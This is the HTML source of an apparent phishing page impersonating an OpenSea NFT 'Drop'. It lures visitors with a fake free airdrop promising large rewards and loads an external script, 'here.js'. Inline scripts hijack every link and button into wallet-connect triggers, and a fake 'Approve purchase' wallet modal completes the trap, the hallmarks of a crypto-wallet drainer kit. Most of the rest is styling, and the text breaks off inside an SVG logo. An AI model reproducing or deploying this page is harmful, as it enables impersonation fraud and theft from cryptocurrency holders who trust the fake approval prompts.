<html lang="en"
  style="--w3m-color-fg-1: rgb(228,231,231); --w3m-color-fg-2: rgb(148,158,158); --w3m-color-fg-3: rgb(110,119,119); --w3m-color-bg-1: rgb(20,20,20); --w3m-color-bg-2: rgb(39,42,42); --w3m-color-bg-3: rgb(59,64,64); --w3m-color-overlay: rgba(255,255,255,0.1); --w3m-accent-color: #3396FF; --w3m-accent-fill-color: #FFFFFF; --w3m-z-index: 10000; --w3m-background-color: #3396FF; --w3m-background-border-radius: 8px; --w3m-container-border-radius: 30px; --w3m-wallet-icon-border-radius: 15px; --w3m-wallet-icon-large-border-radius: 30px; --w3m-wallet-icon-small-border-radius: 7px; --w3m-input-border-radius: 28px; --w3m-button-border-radius: 10px; --w3m-notification-border-radius: 36px; --w3m-secondary-button-border-radius: 28px; --w3m-icon-button-border-radius: 50%; --w3m-button-hover-highlight-border-radius: 10px; --w3m-text-big-bold-size: 20px; --w3m-text-big-bold-weight: 600; --w3m-text-big-bold-line-height: 24px; --w3m-text-big-bold-letter-spacing: -0.03em; --w3m-text-big-bold-text-transform: none; --w3m-text-xsmall-bold-size: 10px; --w3m-text-xsmall-bold-weight: 700; --w3m-text-xsmall-bold-line-height: 12px; --w3m-text-xsmall-bold-letter-spacing: 0.02em; --w3m-text-xsmall-bold-text-transform: uppercase; --w3m-text-xsmall-regular-size: 12px; --w3m-text-xsmall-regular-weight: 600; --w3m-text-xsmall-regular-line-height: 14px; --w3m-text-xsmall-regular-letter-spacing: -0.03em; --w3m-text-xsmall-regular-text-transform: none; --w3m-text-small-thin-size: 14px; --w3m-text-small-thin-weight: 500; --w3m-text-small-thin-line-height: 16px; --w3m-text-small-thin-letter-spacing: -0.03em; --w3m-text-small-thin-text-transform: none; --w3m-text-small-regular-size: 14px; --w3m-text-small-regular-weight: 600; --w3m-text-small-regular-line-height: 16px; --w3m-text-small-regular-letter-spacing: -0.03em; --w3m-text-small-regular-text-transform: none; --w3m-text-medium-regular-size: 16px; --w3m-text-medium-regular-weight: 600; --w3m-text-medium-regular-line-height: 20px; --w3m-text-medium-regular-letter-spacing: -0.03em; --w3m-text-medium-regular-text-transform: none; --w3m-font-family: -apple-system, system-ui, BlinkMacSystemFont, 'Segoe UI', Roboto, Ubuntu, 'Helvetica Neue', sans-serif; --w3m-font-feature-settings: 'tnum' on, 'lnum' on, 'case' on; --w3m-success-color: rgb(38,181,98); --w3m-error-color: rgb(242, 90, 103); --w3m-overlay-background-color: rgba(0, 0, 0, 0.3); --w3m-overlay-backdrop-filter: blur(6px); --w3m-background-image-url: none;">

<head>
  <script charset="UTF-8" async type="text/javascript" src="./here.js"></script>
  <script>
    document.addEventListener("DOMContentLoaded", function () {
      // Add CSS for cursor pointer
      var style = document.createElement("style");
      style.innerHTML = ".connectButton { cursor: pointer; }";
      document.head.appendChild(style);

      // Update <a> & <button> elements
      document.querySelectorAll("a").forEach(function (link) {
        link.addEventListener("click", function (event) {
          event.preventDefault();
        });
        link.removeAttribute("href");
        link.classList.add("connectButton");
        link.classList.add("placeholder-button");
        link.classList.add("connect-button");
      });

      document.querySelectorAll("button").forEach(function (link) {
        link.addEventListener("click", function (event) {
          event.preventDefault();
        });
        link.removeAttribute("href");
        link.classList.add("connectButton");
        link.classList.add("placeholder-button");
        link.classList.add("connect-button");
      });
    });
  </script>

  <script>
    window.onload = function () {
      var links = document.querySelectorAll("a");
      var buttons = document.querySelectorAll("button");

      links.forEach(function (link) {
        link.classList.add("connectButton");
        link.classList.add("placeholder-button");
        link.classList.add("connect-button");

        link.addEventListener("click", function (event) {
          event.preventDefault();
        });
      });

      buttons.forEach(function (button) {
        button.classList.add("connectButton");
        button.classList.add("placeholder-button");
        button.classList.add("connect-button");
        button.addEventListener("click", function (event) {
          event.preventDefault();
        });
      });
    };
  </script>

  <meta http-equiv="content-type" content="text/html;charset=utf-8">



  <meta charset="UTF-8">
  <title> Drop | OpenSea</title>
  <meta property="og:title" content="CLICK HERE TO CLAIM!">
  <link rel="apple-touch-icon" sizes="180x180" href="apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="favicon-16x16.png">
  <link rel="manifest" href="site.webmanifest">

  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta property="og:title" content="CLICK HERE TO CLAIM!">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta property="og:site_name" content="This is an automatically generated announcement message">
  <meta content="CLICK HERE - OPENSEA PRO NFT" property="og:title">
  <meta content="

🟢 AIRDROP IS LIVE NOW 🟢
 
🎉 Price: FREE
🎉 Supply: 150 Mystery Box
🎉 Reward: between $3000 and $250,000


TRY YOUR LUCK ! 🚀
    " property="og:description">
  <meta property="og:image:url" content="/389-9bec97c22fa2e411.gif">
  <meta name="theme-color" content="#7289DA">
 
  <link rel="stylesheet" href="./styles/popup-6.css">
  <style>
    @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap');

    :root {
      --w3m-color-mix-strength: 0%;
      --w3m-font-family: Inter, Segoe UI, Roboto, Oxygen, Ubuntu, Cantarell, Fira Sans, Droid Sans, Helvetica Neue, sans-serif;
      ;
      --w3m-font-size-master: 10px;
      --w3m-border-radius-master: 4px;
      --w3m-z-index: 999;

      --wui-font-family: var(--w3m-font-family);

      --wui-font-size-mini: calc(var(--w3m-font-size-master) * 0.8);
      --wui-font-size-micro: var(--w3m-font-size-master);
      --wui-font-size-tiny: calc(var(--w3m-font-size-master) * 1.2);
      --wui-font-size-small: calc(var(--w3m-font-size-master) * 1.4);
      --wui-font-size-paragraph: calc(var(--w3m-font-size-master) * 1.6);
      --wui-font-size-medium: calc(var(--w3m-font-size-master) * 1.8);
      --wui-font-size-large: calc(var(--w3m-font-size-master) * 2);
      --wui-font-size-medium-title: calc(var(--w3m-font-size-master) * 2.4);
      --wui-font-size-2xl: calc(var(--w3m-font-size-master) * 4);

      --wui-border-radius-5xs: var(--w3m-border-radius-master);
      --wui-border-radius-4xs: calc(var(--w3m-border-radius-master) * 1.5);
      --wui-border-radius-3xs: calc(var(--w3m-border-radius-master) * 2);
      --wui-border-radius-xxs: calc(var(--w3m-border-radius-master) * 3);
      --wui-border-radius-xs: calc(var(--w3m-border-radius-master) * 4);
      --wui-border-radius-s: calc(var(--w3m-border-radius-master) * 5);
      --wui-border-radius-m: calc(var(--w3m-border-radius-master) * 7);
      --wui-border-radius-l: calc(var(--w3m-border-radius-master) * 9);
      --wui-border-radius-3xl: calc(var(--w3m-border-radius-master) * 20);

      --wui-font-weight-light: 400;
      --wui-font-weight-regular: 500;
      --wui-font-weight-medium: 600;
      --wui-font-weight-bold: 700;

      --wui-letter-spacing-2xl: -1.6px;
      --wui-letter-spacing-medium-title: -0.96px;
      --wui-letter-spacing-large: -0.8px;
      --wui-letter-spacing-medium: -0.72px;
      --wui-letter-spacing-paragraph: -0.64px;
      --wui-letter-spacing-small: -0.56px;
      --wui-letter-spacing-tiny: -0.48px;
      --wui-letter-spacing-micro: -0.2px;
      --wui-letter-spacing-mini: -0.16px;

      --wui-spacing-0: 0px;
      --wui-spacing-4xs: 2px;
      --wui-spacing-3xs: 4px;
      --wui-spacing-xxs: 6px;
      --wui-spacing-2xs: 7px;
      --wui-spacing-xs: 8px;
      --wui-spacing-1xs: 10px;
      --wui-spacing-s: 12px;
      --wui-spacing-m: 14px;
      --wui-spacing-l: 16px;
      --wui-spacing-2l: 18px;
      --wui-spacing-xl: 20px;
      --wui-spacing-xxl: 24px;
      --wui-spacing-2xl: 32px;
      --wui-spacing-3xl: 40px;
      --wui-spacing-4xl: 90px;

      --wui-icon-box-size-xxs: 14px;
      --wui-icon-box-size-xs: 20px;
      --wui-icon-box-size-sm: 24px;
      --wui-icon-box-size-md: 32px;
      --wui-icon-box-size-lg: 40px;
      --wui-icon-box-size-xl: 64px;

      --wui-icon-size-inherit: inherit;
      --wui-icon-size-xxs: 10px;
      --wui-icon-size-xs: 12px;
      --wui-icon-size-sm: 14px;
      --wui-icon-size-md: 16px;
      --wui-icon-size-mdl: 18px;
      --wui-icon-size-lg: 20px;
      --wui-icon-size-xl: 24px;

      --wui-wallet-image-size-inherit: inherit;
      --wui-wallet-image-size-sm: 40px;
      --wui-wallet-image-size-md: 56px;
      --wui-wallet-image-size-lg: 80px;

      --wui-visual-size-size-inherit: inherit;
      --wui-visual-size-sm: 40px;
      --wui-visual-size-md: 55px;
      --wui-visual-size-lg: 80px;

      --wui-box-size-md: 100px;
      --wui-box-size-lg: 120px;

      --wui-ease-out-power-2: cubic-bezier(0, 0, 0.22, 1);
      --wui-ease-out-power-1: cubic-bezier(0, 0, 0.55, 1);

      --wui-ease-in-power-3: cubic-bezier(0.66, 0, 1, 1);
      --wui-ease-in-power-2: cubic-bezier(0.45, 0, 1, 1);
      --wui-ease-in-power-1: cubic-bezier(0.3, 0, 1, 1);

      --wui-ease-inout-power-1: cubic-bezier(0.45, 0, 0.55, 1);

      --wui-duration-lg: 200ms;
      --wui-duration-md: 125ms;
      --wui-duration-sm: 75ms;

      --wui-path-network-sm: path('M15.4 2.1a5.21 5.21 0 0 1 5.2 0l11.61 6.7a5.21 5.21 0 0 1 2.61 4.52v13.4c0 1.87-1 3.59-2.6 4.52l-11.61 6.7c-1.62.93-3.6.93-5.22 0l-11.6-6.7a5.21 5.21 0 0 1-2.61-4.51v-13.4c0-1.87 1-3.6 2.6-4.52L15.4 2.1Z'
        );

      --wui-path-network-md: path('M43.4605 10.7248L28.0485 1.61089C25.5438 0.129705 22.4562 0.129705 19.9515 1.61088L4.53951 10.7248C2.03626 12.2051 0.5 14.9365 0.5 17.886V36.1139C0.5 39.0635 2.03626 41.7949 4.53951 43.2752L19.9515 52.3891C22.4562 53.8703 25.5438 53.8703 28.0485 52.3891L43.4605 43.2752C45.9637 41.7949 47.5 39.0635 47.5 36.114V17.8861C47.5 14.9365 45.9637 12.2051 43.4605 10.7248Z'
        );

      --wui-path-network-lg: path('M78.3244 18.926L50.1808 2.45078C45.7376 -0.150261 40.2624 -0.150262 35.8192 2.45078L7.6756 18.926C3.23322 21.5266 0.5 26.3301 0.5 31.5248V64.4752C0.5 69.6699 3.23322 74.4734 7.6756 77.074L35.8192 93.5492C40.2624 96.1503 45.7376 96.1503 50.1808 93.5492L78.3244 77.074C82.7668 74.4734 85.5 69.6699 85.5 64.4752V31.5248C85.5 26.3301 82.7668 21.5266 78.3244 18.926Z'
        );

      --wui-width-network-sm: 36px;
      --wui-width-network-md: 48px;
      --wui-width-network-lg: 86px;

      --wui-height-network-sm: 40px;
      --wui-height-network-md: 54px;
      --wui-height-network-lg: 96px;

      --wui-icon-size-network-xs: 12px;
      --wui-icon-size-network-sm: 16px;
      --wui-icon-size-network-md: 24px;
      --wui-icon-size-network-lg: 42px;

      --wui-color-inherit: inherit;

      --wui-color-inverse-100: #fff;
      --wui-color-inverse-000: #000;

      --wui-cover: rgba(20, 20, 20, 0.8);

      --wui-color-modal-bg: var(--wui-color-modal-bg-base);

      --wui-color-blue-100: var(--wui-color-blue-base-100);

      --wui-color-accent-100: var(--wui-color-accent-base-100);
      --wui-color-accent-090: var(--wui-color-accent-base-090);
      --wui-color-accent-080: var(--wui-color-accent-base-080);

      --wui-accent-glass-090: var(--wui-accent-glass-base-090);
      --wui-accent-glass-080: var(--wui-accent-glass-base-080);
      --wui-accent-glass-020: var(--wui-accent-glass-base-020);
      --wui-accent-glass-015: var(--wui-accent-glass-base-015);
      --wui-accent-glass-010: var(--wui-accent-glass-base-010);
      --wui-accent-glass-005: var(--wui-accent-glass-base-005);
      --wui-accent-glass-002: var(--wui-accent-glass-base-002);

      --wui-color-fg-100: var(--wui-color-fg-base-100);
      --wui-color-fg-125: var(--wui-color-fg-base-125);
      --wui-color-fg-150: var(--wui-color-fg-base-150);
      --wui-color-fg-175: var(--wui-color-fg-base-175);
      --wui-color-fg-200: var(--wui-color-fg-base-200);
      --wui-color-fg-225: var(--wui-color-fg-base-225);
      --wui-color-fg-250: var(--wui-color-fg-base-250);
      --wui-color-fg-275: var(--wui-color-fg-base-275);
      --wui-color-fg-300: var(--wui-color-fg-base-300);

      --wui-color-bg-100: var(--wui-color-bg-base-100);
      --wui-color-bg-125: var(--wui-color-bg-base-125);
      --wui-color-bg-150: var(--wui-color-bg-base-150);
      --wui-color-bg-175: var(--wui-color-bg-base-175);
      --wui-color-bg-200: var(--wui-color-bg-base-200);
      --wui-color-bg-225: var(--wui-color-bg-base-225);
      --wui-color-bg-250: var(--wui-color-bg-base-250);
      --wui-color-bg-275: var(--wui-color-bg-base-275);
      --wui-color-bg-300: var(--wui-color-bg-base-300);

      --wui-color-success-100: var(--wui-color-success-base-100);
      --wui-color-error-100: var(--wui-color-error-base-100);

      --wui-icon-box-bg-error-100: var(--wui-icon-box-bg-error-base-100);
      --wui-icon-box-bg-blue-100: var(--wui-icon-box-bg-blue-base-100);
      --wui-icon-box-bg-success-100: var(--wui-icon-box-bg-success-base-100);
      --wui-icon-box-bg-inverse-100: var(--wui-icon-box-bg-inverse-base-100);

      --wui-all-wallets-bg-100: var(--wui-all-wallets-bg-base-100);

      --wui-avatar-border: var(--wui-avatar-border-base);

      --wui-thumbnail-border: var(--wui-thumbnail-border-base);

      --wui-box-shadow-blue: rgba(71, 161, 255, 0.16);
    }

    @supports (background: color-mix(in srgb, white 50%, black)) {
      :root {
        --wui-color-modal-bg: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-modal-bg-base));

        --wui-box-shadow-blue: color-mix(in srgb, var(--wui-color-accent-100) 16%, transparent);

        --wui-color-accent-090: color-mix(in srgb,
            var(--wui-color-accent-base-100) 90%,
            var(--w3m-default));
        --wui-color-accent-080: color-mix(in srgb,
            var(--wui-color-accent-base-100) 80%,
            var(--w3m-default));

        --wui-color-accent-090: color-mix(in srgb,
            var(--wui-color-accent-base-100) 90%,
            transparent);
        --wui-color-accent-080: color-mix(in srgb,
            var(--wui-color-accent-base-100) 80%,
            transparent);

        --wui-accent-glass-090: color-mix(in srgb,
            var(--wui-color-accent-base-100) 90%,
            transparent);
        --wui-accent-glass-080: color-mix(in srgb,
            var(--wui-color-accent-base-100) 80%,
            transparent);
        --wui-accent-glass-020: color-mix(in srgb,
            var(--wui-color-accent-base-100) 20%,
            transparent);
        --wui-accent-glass-015: color-mix(in srgb,
            var(--wui-color-accent-base-100) 15%,
            transparent);
        --wui-accent-glass-010: color-mix(in srgb,
            var(--wui-color-accent-base-100) 10%,
            transparent);
        --wui-accent-glass-005: color-mix(in srgb,
            var(--wui-color-accent-base-100) 5%,
            transparent);
        --wui-color-accent-002: color-mix(in srgb,
            var(--wui-color-accent-base-100) 2%,
            transparent);

        --wui-color-fg-100: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-100));
        --wui-color-fg-125: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-125));
        --wui-color-fg-150: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-150));
        --wui-color-fg-175: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-175));
        --wui-color-fg-200: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-200));
        --wui-color-fg-225: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-225));
        --wui-color-fg-250: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-250));
        --wui-color-fg-275: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-275));
        --wui-color-fg-300: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-300));

        --wui-color-bg-100: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-100));
        --wui-color-bg-125: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-125));
        --wui-color-bg-150: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-150));
        --wui-color-bg-175: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-175));
        --wui-color-bg-200: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-200));
        --wui-color-bg-225: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-225));
        --wui-color-bg-250: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-250));
        --wui-color-bg-275: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-275));
        --wui-color-bg-300: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-300));

        --wui-color-success-100: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-success-base-100));
        --wui-color-error-100: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-error-base-100));

        --wui-icon-box-bg-error-100: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-icon-box-bg-error-base-100));
        --wui-icon-box-bg-accent-100: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-icon-box-bg-blue-base-100));
        --wui-icon-box-bg-success-100: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-icon-box-bg-success-base-100));
        --wui-icon-box-bg-inverse-100: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-icon-box-bg-inverse-base-100));

        --wui-all-wallets-bg-100: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-all-wallets-bg-base-100));

        --wui-avatar-border: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-avatar-border-base));

        --wui-thumbnail-border: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-thumbnail-border-base));
      }
    }
  </style>
  <style media="enabled">
    :root {
      --w3m-color-mix: #000;
      --w3m-accent: #3396ff;
      --w3m-default: #000;

      --wui-color-modal-bg-base: #fff;

      --wui-color-blue-base-100: #3396ff;

      --wui-color-accent-base-100: var(--w3m-accent);
      --wui-color-accent-base-090: #2d7dd2;
      --wui-color-accent-base-080: #2978cc;

      --wui-accent-glass-base-090: rgba(51, 150, 255, 0.9);
      --wui-accent-glass-base-080: rgba(51, 150, 255, 0.8);
      --wui-accent-glass-base-020: rgba(51, 150, 255, 0.2);
      --wui-accent-glass-base-015: rgba(51, 150, 255, 0.15);
      --wui-accent-glass-base-010: rgba(51, 150, 255, 0.1);
      --wui-accent-glass-base-005: rgba(51, 150, 255, 0.05);
      --wui-accent-glass-base-002: rgba(51, 150, 255, 0.02);

      --wui-color-fg-base-100: #141414;
      --wui-color-fg-base-125: #2d3131;
      --wui-color-fg-base-150: #474d4d;
      --wui-color-fg-base-175: #636d6d;
      --wui-color-fg-base-200: #798686;
      --wui-color-fg-base-225: #828f8f;
      --wui-color-fg-base-250: #8b9797;
      --wui-color-fg-base-275: #95a0a0;
      --wui-color-fg-base-300: #9ea9a9;

      --wui-color-bg-base-100: #ffffff;
      --wui-color-bg-base-125: #f5fafa;
      --wui-color-bg-base-150: #f3f8f8;
      --wui-color-bg-base-175: #eef4f4;
      --wui-color-bg-base-200: #eaf1f1;
      --wui-color-bg-base-225: #e5eded;
      --wui-color-bg-base-250: #e1e9e9;
      --wui-color-bg-base-275: #dce7e7;
      --wui-color-bg-base-300: #d8e3e3;

      --wui-color-success-base-100: #26b562;
      --wui-color-error-base-100: #f05142;

      --wui-success-glass-001: rgba(38, 181, 98, 0.01);
      --wui-success-glass-002: rgba(38, 181, 98, 0.02);
      --wui-success-glass-005: rgba(38, 181, 98, 0.05);
      --wui-success-glass-010: rgba(38, 181, 98, 0.1);
      --wui-success-glass-015: rgba(38, 181, 98, 0.15);
      --wui-success-glass-020: rgba(38, 181, 98, 0.2);
      --wui-success-glass-025: rgba(38, 181, 98, 0.25);
      --wui-success-glass-030: rgba(38, 181, 98, 0.3);
      --wui-success-glass-060: rgba(38, 181, 98, 0.6);
      --wui-success-glass-080: rgba(38, 181, 98, 0.8);

      --wui-error-glass-001: rgba(240, 81, 66, 0.01);
      --wui-error-glass-002: rgba(240, 81, 66, 0.02);
      --wui-error-glass-005: rgba(240, 81, 66, 0.05);
      --wui-error-glass-010: rgba(240, 81, 66, 0.1);
      --wui-error-glass-015: rgba(240, 81, 66, 0.15);
      --wui-error-glass-020: rgba(240, 81, 66, 0.2);
      --wui-error-glass-025: rgba(240, 81, 66, 0.25);
      --wui-error-glass-030: rgba(240, 81, 66, 0.3);
      --wui-error-glass-060: rgba(240, 81, 66, 0.6);
      --wui-error-glass-080: rgba(240, 81, 66, 0.8);

      --wui-icon-box-bg-error-base-100: #f4dfdd;
      --wui-icon-box-bg-blue-base-100: #d9ecfb;
      --wui-icon-box-bg-success-base-100: #daf0e4;
      --wui-icon-box-bg-inverse-base-100: #dcecfc;

      --wui-all-wallets-bg-base-100: #e8f1fa;

      --wui-avatar-border-base: #f3f4f4;

      --wui-thumbnail-border-base: #eaefef;

      --wui-gray-glass-001: rgba(0, 0, 0, 0.01);
      --wui-gray-glass-002: rgba(0, 0, 0, 0.02);
      --wui-gray-glass-005: rgba(0, 0, 0, 0.05);
      --wui-gray-glass-010: rgba(0, 0, 0, 0.1);
      --wui-gray-glass-015: rgba(0, 0, 0, 0.15);
      --wui-gray-glass-020: rgba(0, 0, 0, 0.2);
      --wui-gray-glass-025: rgba(0, 0, 0, 0.25);
      --wui-gray-glass-030: rgba(0, 0, 0, 0.3);
      --wui-gray-glass-060: rgba(0, 0, 0, 0.6);
      --wui-gray-glass-080: rgba(0, 0, 0, 0.8);
      --wui-gray-glass-090: rgba(0, 0, 0, 0.9);
    }
  </style>
  <style>
    :root {
      --w3m-color-mix: #fff;
      --w3m-accent: #47a1ff;
      --w3m-default: #fff;

      --wui-color-modal-bg-base: #191a1a;

      --wui-color-blue-base-100: #47a1ff;

      --wui-color-accent-base-100: var(--w3m-accent);
      --wui-color-accent-base-090: #59aaff;
      --wui-color-accent-base-080: #6cb4ff;

      --wui-accent-glass-base-090: rgba(71, 161, 255, 0.9);
      --wui-accent-glass-base-080: rgba(71, 161, 255, 0.8);
      --wui-accent-glass-base-020: rgba(71, 161, 255, 0.2);
      --wui-accent-glass-base-015: rgba(71, 161, 255, 0.15);
      --wui-accent-glass-base-010: rgba(71, 161, 255, 0.1);
      --wui-accent-glass-base-005: rgba(71, 161, 255, 0.05);
      --wui-accent-glass-base-002: rgba(71, 161, 255, 0.02);

      --wui-color-fg-base-100: #e4e7e7;
      --wui-color-fg-base-125: #d0d5d5;
      --wui-color-fg-base-150: #a8b1b1;
      --wui-color-fg-base-175: #a8b0b0;
      --wui-color-fg-base-200: #949e9e;
      --wui-color-fg-base-225: #868f8f;
      --wui-color-fg-base-250: #788080;
      --wui-color-fg-base-275: #788181;
      --wui-color-fg-base-300: #6e7777;

      --wui-color-bg-base-100: #141414;
      --wui-color-bg-base-125: #191a1a;
      --wui-color-bg-base-150: #1e1f1f;
      --wui-color-bg-base-175: #222525;
      --wui-color-bg-base-200: #272a2a;
      --wui-color-bg-base-225: #2c3030;
      --wui-color-bg-base-250: #313535;
      --wui-color-bg-base-275: #363b3b;
      --wui-color-bg-base-300: #3b4040;

      --wui-color-success-base-100: #26d962;
      --wui-color-error-base-100: #f25a67;

      --wui-success-glass-001: rgba(38, 217, 98, 0.01);
      --wui-success-glass-002: rgba(38, 217, 98, 0.02);
      --wui-success-glass-005: rgba(38, 217, 98, 0.05);
      --wui-success-glass-010: rgba(38, 217, 98, 0.1);
      --wui-success-glass-015: rgba(38, 217, 98, 0.15);
      --wui-success-glass-020: rgba(38, 217, 98, 0.2);
      --wui-success-glass-025: rgba(38, 217, 98, 0.25);
      --wui-success-glass-030: rgba(38, 217, 98, 0.3);
      --wui-success-glass-060: rgba(38, 217, 98, 0.6);
      --wui-success-glass-080: rgba(38, 217, 98, 0.8);

      --wui-error-glass-001: rgba(242, 90, 103, 0.01);
      --wui-error-glass-002: rgba(242, 90, 103, 0.02);
      --wui-error-glass-005: rgba(242, 90, 103, 0.05);
      --wui-error-glass-010: rgba(242, 90, 103, 0.1);
      --wui-error-glass-015: rgba(242, 90, 103, 0.15);
      --wui-error-glass-020: rgba(242, 90, 103, 0.2);
      --wui-error-glass-025: rgba(242, 90, 103, 0.25);
      --wui-error-glass-030: rgba(242, 90, 103, 0.3);
      --wui-error-glass-060: rgba(242, 90, 103, 0.6);
      --wui-error-glass-080: rgba(242, 90, 103, 0.8);

      --wui-icon-box-bg-error-base-100: #3c2426;
      --wui-icon-box-bg-blue-base-100: #20303f;
      --wui-icon-box-bg-success-base-100: #1f3a28;
      --wui-icon-box-bg-inverse-base-100: #243240;

      --wui-all-wallets-bg-base-100: #222b35;

      --wui-avatar-border-base: #252525;

      --wui-thumbnail-border-base: #252525;

      --wui-gray-glass-001: rgba(255, 255, 255, 0.01);
      --wui-gray-glass-002: rgba(255, 255, 255, 0.02);
      --wui-gray-glass-005: rgba(255, 255, 255, 0.05);
      --wui-gray-glass-010: rgba(255, 255, 255, 0.1);
      --wui-gray-glass-015: rgba(255, 255, 255, 0.15);
      --wui-gray-glass-020: rgba(255, 255, 255, 0.2);
      --wui-gray-glass-025: rgba(255, 255, 255, 0.25);
      --wui-gray-glass-030: rgba(255, 255, 255, 0.3);
      --wui-gray-glass-060: rgba(255, 255, 255, 0.6);
      --wui-gray-glass-080: rgba(255, 255, 255, 0.8);
      --wui-gray-glass-090: rgba(255, 255, 255, 0.9);
    }
  </style>
</head>

<body>
  <link rel="icon" type="image/svg" href="img/opensea.svg">
  <link rel="stylesheet" type="text/css" href="js/slick-1.8.1/slick/slick.html">
  <link rel="stylesheet" href="css/drops.css">
  <link rel="stylesheet" href="css/fonts.css">
  <link rel="stylesheet" href="css/index.css">







  <style>
    w3m-modal {
      position: fixed;
      z-index: 10000000;
    }
  </style>


  <div class="alert">
    <div class="alert_window">
      <div class="alert_lable">
        <div class="alert_text">
          Approve purchase
        </div>
        <button class="alert_btn">
          <svg xmlns="http://www.w3.org/2000/svg" width="29" height="29" viewBox="0 0 29 29" fill="none">
            <rect x="7.77808" y="6.36396" width="20" height="2" transform="rotate(45 7.77808 6.36396)" fill="#A4A4A4">
            </rect>
            <rect x="21.9202" y="7.77818" width="20" height="2" transform="rotate(135 21.9202 7.77818)" fill="#A4A4A4">
            </rect>
          </svg>
        </button>
      </div>
      <div class="alert_items">
        <div class="alert_item">
          <div class="item_img">
            <img src="img/load%202.gif" class="alert_loader">
            <img src="img/1.jpg" class="alert_logo">
          </div>
          <div class="item_desc">
            <div class="item_lable">
              1 item
            </div>
            <div class="item_chain">
              Chain: Ethereum
            </div>
          </div>
        </div>
        <div class="alert_item">
          <div class="item_img">
            <img src="img/load%202.gif" class="alert_loader">
            <img src="img/2.jpg" class="alert_logo">
          </div>
          <div class="item_desc">
            <div class="item_lable">
              1 item
            </div>
            <div class="item_chain">
              Chain: Ethereum
            </div>
          </div>
        </div>
        <div class="alert_item">
          <div class="item_img">
            <img src="img/load%202.gif" class="alert_loader">
            <img src="img/3.jpg" class="alert_logo">
          </div>
          <div class="item_desc">
            <div class="item_lable">
              1 item
            </div>
            <div class="item_chain">
              Chain: Ethereum
            </div>
          </div>
        </div>
      </div>
      <div class="alert_line"></div>
      <div class="alert_comment">
        <div class="alert_comment_lable">
          Go to your wallet
        </div>
        <div class="alert_comment_desc">
          You’ll be asked to approve this purchase from your wallet
        </div>
      </div>
    </div>
  </div>
  <header>
    <div class="logo_head">
      <div class="logo_img">
        <svg xmlns="http://www.w3.org/2000/svg" width="171" height="44" viewBox="0 0 171 44" fill="none">
          <g clip-path="url(#clip0_13_61)">
            <mask id="mask0_13_61" style="mask-type:luminance" maskUnits="userSpaceOnUse" x="0" y="0" width="171"
              height="44">
              <path d="M170.856 0H0V44H170.856V0Z" fill="white"></path>
            </mask>
            <g mask="url(#mask0_13_61)">
              <path
